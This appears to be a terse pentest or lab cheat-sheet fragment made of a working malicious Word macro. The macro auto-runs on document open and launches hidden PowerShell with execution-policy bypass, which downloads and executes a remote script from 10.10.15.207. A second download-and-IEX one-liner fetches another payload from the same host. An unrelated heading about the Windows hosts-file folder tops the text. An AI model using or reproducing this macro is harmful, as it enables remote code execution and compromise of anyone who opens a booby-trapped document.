**C:\Windows\System32\drivers\etc folder**

Macro preparation
Sub MyMacro()
Dim str2 As String
str2 = "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.15.207/large1.ps1'))"
Shell str2, vbHide
End Sub
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub



(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX
